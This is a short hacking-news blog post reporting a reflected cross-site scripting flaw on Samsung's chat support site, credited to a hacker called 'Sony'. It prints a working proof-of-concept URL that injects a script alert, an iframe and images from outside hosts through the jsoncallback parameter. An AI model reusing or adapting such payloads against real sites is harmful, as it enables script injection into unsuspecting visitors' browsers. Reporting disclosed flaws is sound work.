XSS(Cross Site Scripting) Vulnerability found in Samsung.com

A Hacker named as "Sony" found XSS vulnerability in Samsung website. According to his report, the http://chat.support.samsung.com is vulnerable to XSS Attack.

Screenshot of Vulnerability:


POC:
http://chat.support.samsung.com/LiveChat/chkCIC?site_cd=AE&jsoncallback=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Cheers%20to%20a%20new%20year%20and%20another%20chance%20for%20us%20to%20get%20it%20right.%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/45wmyMgyZuY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_santa_claus/santa_claus_78.gif%20align=center%3E%3Cimg%20src=http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%20align=center%3E

The original post can be found here. Few months back, he found the XSS vulnerability in Adobe Profile page.

Visitors

Free counters!

Receive all updates via Facebook. Just Click the Like Button Below...

Powered By MauriHackerS

Translate

MauriHackerS - Providing Latest IT Security and Hacking News !